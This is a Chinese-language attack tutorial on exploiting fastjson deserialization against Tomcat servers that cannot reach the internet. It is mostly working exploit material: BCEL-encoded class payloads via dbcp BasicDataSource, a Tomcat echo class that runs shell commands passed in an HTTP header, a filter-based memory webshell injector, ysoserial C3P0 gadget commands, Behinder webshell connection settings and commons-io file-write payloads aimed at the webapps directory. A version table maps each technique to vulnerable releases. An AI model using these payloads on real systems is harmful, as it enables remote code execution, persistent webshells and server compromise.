前言
实战中经常会遇到目标不出网、或者 fastjson 漏洞无法通过 LDAP 加载远程类的情况,这里探究一下不出网情况下的利用方式。
BCEL类
利用 Tomcat 自带 dbcp 的 BasicDataSource 链:将 PoC 类的字节码用 BCEL 编码后随 payload 发送,由 BCEL ClassLoader 在目标 JVM 内加载。
- Tomcat的依赖
- JDK < 8u251
环境:
- fastjson 1.2.24 版本
- apache-tomcat-8.5.37 利用
创建恶意类
import java.io.IOException;
/**
* @author cseroad
*/
public class exp {
static {
try {
Runtime.getRuntime().exec("calc");
} catch (IOException e) {
e.printStackTrace();
}
}
}
然后对该类的字节码进行 $$BCEL$$ 编码:
public class Test {
public static void main(String[] args) throws IOException {
JavaClass javaClass = Repository.lookupClass(exp.class);
String encode = Utility.encode(javaClass.getBytes(), true);
System.out.println(encode);
}
}
构造的 payload 如下:
{
{
"x":{
"@type": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource",
"driverClassLoader": {
"@type": "com.sun.org.apache.bcel.internal.util.ClassLoader"
},
"driverClassName": "$$BCEL$$$l$..."
}
}: "x"
}
Tomcat 8.0以上使用org.apache.tomcat.dbcp.dbcp2.BasicDataSource
Tomcat 8.0以下使用org.apache.tomcat.dbcp.dbcp.BasicDataSource
tomcat 回显代码
import java.lang.reflect.Field;
import java.util.List;
import java.util.Scanner;
public class TomcatEcho {
private static void writeBody(Object var0, byte[] var1) throws Exception {
Object var2;
Class var3;
try {
var3 = Class.forName("org.apache.tomcat.util.buf.ByteChunk");
var2 = var3.newInstance();
var3.getDeclaredMethod("setBytes", byte[].class, Integer.TYPE, Integer.TYPE).invoke(var2, var1, new Object[]{new Integer(0), new Integer(var1.length)});
var0.getClass().getMethod("doWrite", var3).invoke(var0, var2);
} catch (ClassNotFoundException var5) {
var3 = Class.forName("java.nio.ByteBuffer");
var2 = var3.getDeclaredMethod("wrap", byte[].class).invoke(var3, var1);
var0.getClass().getMethod("doWrite", var3).invoke(var0, var2);
} catch (NoSuchMethodException var6) {
var3 = Class.forName("java.nio.ByteBuffer");
var2 = var3.getDeclaredMethod("wrap", byte[].class).invoke(var3, var1);
var0.getClass().getMethod("doWrite", var3).invoke(var0, var2);
}
}
private static Object getFV(Object var0, String var1) throws Exception {
Field var2 = null;
Class var3 = var0.getClass();
while(var3 != Object.class) {
try {
var2 = var3.getDeclaredField(var1);
break;
} catch (NoSuchFieldException var5) {
var3 = var3.getSuperclass();
}
}
if (var2 == null) {
throw new NoSuchFieldException(var1);
} else {
var2.setAccessible(true);
return var2.get(var0);
}
}
static {
try {
boolean var0 = false;
Thread[] var1 = (Thread[])((Thread[])getFV(Thread.currentThread().getThreadGroup(), "threads"));
for(int var2 = 0; var2 < var1.length; ++var2) {
Thread var3 = var1[var2];
if (var3 != null) {
String var4 = var3.getName();
if (!var4.contains("exec") && var4.contains("http")) {
Object var5 = getFV(var3, "target");
if (var5 instanceof Runnable) {
try {
var5 = getFV(getFV(getFV(var5, "this$0"), "handler"), "global");
} catch (Exception var11) {
continue;
}
List var6 = (List)getFV(var5, "processors");
for(int var7 = 0; var7 < var6.size(); ++var7) {
Object var8 = var6.get(var7);
var5 = getFV(var8, "req");
Object var9 = var5.getClass().getMethod("getResponse").invoke(var5);
var4 = (String)var5.getClass().getMethod("getHeader", String.class).invoke(var5, new String("Testecho"));
if (var4 != null && !var4.isEmpty()) {
var9.getClass().getMethod("setStatus", Integer.TYPE).invoke(var9, new Integer(200));
var9.getClass().getMethod("addHeader", String.class, String.class).invoke(var9, new String("Testecho"), var4);
var0 = true;
}
var4 = (String)var5.getClass().getMethod("getHeader", String.class).invoke(var5, new String("Testcmd"));
if (var4 != null && !var4.isEmpty()) {
var9.getClass().getMethod("setStatus", Integer.TYPE).invoke(var9, new Integer(200));
String[] var10 = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", var4} : new String[]{"/bin/sh", "-c", var4};
writeBody(var9, (new Scanner((new ProcessBuilder(var10)).start().getInputStream())).useDelimiter("\\A").next().getBytes());
var0 = true;
}
if ((var4 == null || var4.isEmpty()) && var0) {
writeBody(var9, System.getProperties().toString().getBytes());
}
if (var0) {
break;
}
}
if (var0) {
break;
}
}
}
}
}
} catch (Exception var12) {
}
}
}
tomcat 内存马代码
package com.fastjson.vul;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.Method;
import java.util.HashMap;
import java.util.Vector;
public class TomcatMemory7 {
static {
try {
Method method = Thread.currentThread().getContextClassLoader().getClass().getSuperclass().getDeclaredMethod("getResources");
Object o = method.invoke(Thread.currentThread().getContextClassLoader());
Method method2 = o.getClass().getDeclaredMethod("getContext");
Object o2 = method2.invoke(o);
Constructor B64DecodeConstructor = Class.forName("sun.misc.BASE64Decoder", true, Thread.currentThread().getContextClassLoader()).getDeclaredConstructor();
Object b64Decoder = B64DecodeConstructor.newInstance();
String codeClass = "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";
ClassLoader currentClassloader = Thread.currentThread().getContextClassLoader();
Method defineClass = Thread.currentThread().getContextClassLoader().getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getDeclaredMethod("defineClass", byte[].class, Integer.TYPE, Integer.TYPE);
defineClass.setAccessible(true);
Class evilClass = (Class)defineClass.invoke(currentClassloader, (byte[])((byte[])((byte[])b64Decoder.getClass().getSuperclass().getDeclaredMethod("decodeBuffer", String.class).invoke(b64Decoder, codeClass))), 0, ((byte[])((byte[])((byte[])b64Decoder.getClass().getSuperclass().getDeclaredMethod("decodeBuffer", String.class).invoke(b64Decoder, codeClass)))).length);
Field currentClassloaderClasses = Thread.currentThread().getContextClassLoader().getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getDeclaredField("classes");
currentClassloaderClasses.setAccessible(true);
Vector classes = (Vector)currentClassloaderClasses.get(currentClassloader);
classes.add(0, evilClass);
Class filterClass = Class.forName("test.godzila", true, Thread.currentThread().getContextClassLoader());
Object filter = filterClass.newInstance();
Class filterDefClass = Class.forName("org.apache.tomcat.util.descriptor.web.FilterDef", true, Thread.currentThread().getContextClassLoader());
Object filterDef = filterDefClass.newInstance();
filterDefClass.getDeclaredMethod("setFilterName", String.class).invoke(filterDef, "supersb");
filterDefClass.getDeclaredMethod("setFilterClass", String.class).invoke(filterDef, filter.getClass().getName());
filterDefClass.getDeclaredMethod("setFilter", Class.forName("javax.servlet.Filter", true, Thread.currentThread().getContextClassLoader())).invoke(filterDef, filter);
Method addfilterdef = o2.getClass().getDeclaredMethod("addFilterDef", filterDefClass);
addfilterdef.invoke(o2, filterDef);
Constructor filterMapConstructor = Class.forName("org.apache.tomcat.util.descriptor.web.FilterMap", true, Thread.currentThread().getContextClassLoader()).getDeclaredConstructor();
Object filterMap = filterMapConstructor.newInstance();
Method setFilterName = filterMap.getClass().getDeclaredMethod("setFilterName", String.class);
setFilterName.invoke(filterMap, filterDef.getClass().getDeclaredMethod("getFilterName").invoke(filterDef, (Object[])null));
Method setDispatcher = filterMap.getClass().getDeclaredMethod("setDispatcher", String.class);
setDispatcher.invoke(filterMap, "REQUEST");
Method addURLPattern = filterMap.getClass().getDeclaredMethod("addURLPattern", String.class);
addURLPattern.invoke(filterMap, "/supersb");
Method addFilterMapBefore = o2.getClass().getDeclaredMethod("addFilterMapBefore", Class.forName("org.apache.tomcat.util.descriptor.web.FilterMap", true, Thread.currentThread().getContextClassLoader()));
addFilterMapBefore.invoke(o2, filterMap);
Constructor constructor = Class.forName("org.apache.catalina.core.ApplicationFilterConfig", true, Thread.currentThread().getContextClassLoader()).getDeclaredConstructor(Class.forName("org.apache.catalina.Context", true, Thread.currentThread().getContextClassLoader()), Class.forName("org.apache.tomcat.util.descriptor.web.FilterDef", true, Thread.currentThread().getContextClassLoader()));
constructor.setAccessible(true);
Object filterConfig = constructor.newInstance(o2, filterDef);
Field filterconfigsfield = Class.forName("org.apache.catalina.core.StandardContext", true, Thread.currentThread().getContextClassLoader()).getDeclaredField("filterConfigs");
filterconfigsfield.setAccessible(true);
HashMap filterConfigs = (HashMap)filterconfigsfield.get(o2);
filterConfigs.put("supersb", filterConfig);
} catch (Exception var27) {
}
}
}
fastjson 1.2.36 版本
{"name":{"@type":"java.lang.Class","val":"org.apache.tomcat.dbcp.dbcp2.BasicDataSource"},"x":{"name": {"@type":"java.lang.Class","val":"com.sun.org.apache.bcel.internal.util.ClassLoader"},"y":
{"@type":"com.alibaba.fastjson.JSONObject","c": {"@type":"org.apache.tomcat.dbcp.dbcp2.BasicDataSource","driverClassLoader": {"@type":"com.sun.org.apache.bcel.internal.util.ClassLoader"},
"driverClassName":"$$BCEL$$...","$ref":"$.x.y.c.connection"}}}}
C3P0二次序列化
需要依赖
<dependency>
<groupId>com.mchange</groupId>
<artifactId>c3p0</artifactId>
<version>0.9.5.2</version>
</dependency>
只要存在 C3P0 依赖,FastJson <= 1.2.47 均可利用,无需开启 autotype,且不出网也能利用。
使用 https://github.com/Y4er/ysoserial 选择链生成十六进制字符串。
java -jar ysoserial-0.0.6-SNAPSHOT-all.jar Fastjson1 "open -a Calculator" | hex
构造数据包
{"e":{"@type":"java.lang.Class","val":"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource"},"f":{"@type":"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource","userOverridesAsString":"HexAsciiSerializedMap:HEXHEX;"}}
此时就可以进一步利用tomcat回显
java -jar ysoserial-0.0.6-SNAPSHOT-all.jar Fastjson1 "CLASS:TomcatCmdEcho" | hex
{"e":{"@type":"java.lang.Class","val":"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource"},"f":{"@type":"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource","userOverridesAsString":"HexAsciiSerializedMap:hex;"}}
打入内存马
java_secure java -jar ysoserial-0.0.6-SNAPSHOT-all.jar Fastjson1 "CLASS:TomcatFilterMemShellFromJMX" | xxd -p
使用TomcatFilterMemShellFromJMX。
冰蝎连接时配置
x-client-data: rebeyond
Referer: https://www.google.com/
commons-io 文件写入
需要依赖
<dependency>
<groupId>commons-io</groupId>
<artifactId>commons-io</artifactId>
<version>2.5</version>
</dependency>
mac下构造数据包
{"x":{"@type":"com.alibaba.fastjson.JSONObject","input":{"@type":"java.lang.AutoCloseable","@type":"org.apache.commons.io.input.ReaderInputStream","reader":{"@type":"org.apache.commons.io.input.CharSequenceReader","charSequence":{"@type":"java.lang.String""123123aaaaa"},"charsetName":"UTF-8","bufferSize":1024},"branch":{"@type":"java.lang.AutoCloseable","@type":"org.apache.commons.io.output.WriterOutputStream","writer":{"@type":"org.apache.commons.io.output.FileWriterWithEncoding","file":"123.txt","encoding":"UTF-8","append":false},"charset":"UTF-8","bufferSize":1024,"writeImmediately":true},"trigger":{"@type":"java.lang.AutoCloseable","@type":"org.apache.commons.io.input.XmlStreamReader","is":{"@type":"org.apache.commons.io.input.TeeInputStream","input":{"$ref":"$.input"},"branch":{"$ref":"$.branch"},"closeBranch":true},"httpContentType":"text/xml","lenient":false,"defaultEncoding":"UTF-8"},"trigger2":{"@type":"java.lang.AutoCloseable","@type":"org.apache.commons.io.input.XmlStreamReader","is":{"@type":"org.apache.commons.io.input.TeeInputStream","input":{"$ref":"$.input"},"branch":{"$ref":"$.branch"},"closeBranch":true},"httpContentType":"text/xml","lenient":false,"defaultEncoding":"UTF-8"},"trigger3":{"@type":"java.lang.AutoCloseable","@type":"org.apache.commons.io.input.XmlStreamReader","is":{"@type":"org.apache.commons.io.input.TeeInputStream","input":{"$ref":"$.input"},"branch":{"$ref":"$.branch"},"closeBranch":true},"httpContentType":"text/xml","lenient":false,"defaultEncoding":"UTF-8"}}}
成功写入
windows下
{"x":{"@type":"com.alibaba.fastjson.JSONObject","input":{"@type":"java.lang.AutoCloseable","@type":"org.apache.commons.io.input.ReaderInputStream","reader":{"@type":"org.apache.commons.io.input.CharSequenceReader","charSequence":{"@type":"java.lang.String""123123aa"},"charsetName":"UTF-8","bufferSize":1024},"branch":{"@type":"java.lang.AutoCloseable","@type":"org.apache.commons.io.output.WriterOutputStream","writer":{"@type":"org.apache.commons.io.output.FileWriterWithEncoding","file":"../webapps/1.txt","encoding":"UTF-8","append":false},"charsetName":"UTF-8","bufferSize":1024,"writeImmediately":true},"trigger":{"@type":"java.lang.AutoCloseable","@type":"org.apache.commons.io.input.XmlStreamReader","is":{"@type":"org.apache.commons.io.input.TeeInputStream","input":{"$ref":"$.input"},"branch":{"$ref":"$.branch"},"closeBranch":true},"httpContentType":"text/xml","lenient":false,"defaultEncoding":"UTF-8"},"trigger2":{"@type":"java.lang.AutoCloseable","@type":"org.apache.commons.io.input.XmlStreamReader","is":{"@type":"org.apache.commons.io.input.TeeInputStream","input":{"$ref":"$.input"},"branch":{"$ref":"$.branch"},"closeBranch":true},"httpContentType":"text/xml","lenient":false,"defaultEncoding":"UTF-8"},"trigger3":{"@type":"java.lang.AutoCloseable","@type":"org.apache.commons.io.input.XmlStreamReader","is":{"@type":"org.apache.commons.io.input.TeeInputStream","input":{"$ref":"$.input"},"branch":{"$ref":"$.branch"},"closeBranch":true},"httpContentType":"text/xml","lenient":false,"defaultEncoding":"UTF-8"}}}
成功写入。
总结
版本 | tomcat.dbcp(<Tomcat8) | tomcat.dbcp (>Tomcat8) | c3p0 | commons-io(windows) | commons-io(linux) |
---|---|---|---|---|---|
<= 1.2.24 | ✓ | ✓ | ✓ | x | x |
1.2.25 - 1.2.35 | x | x | ✓ | x | x |
1.2.36 | ✓ | ✓ | ✓ | x | x |
1.2.37 - 1.2.47 | ✓ | ✓ | ✓ | ✓ | ✓ |
1.2.48 - 1.2.68 | x | x | x | ✓ | ✓ |
> 1.2.69 | x | x | x | x | x |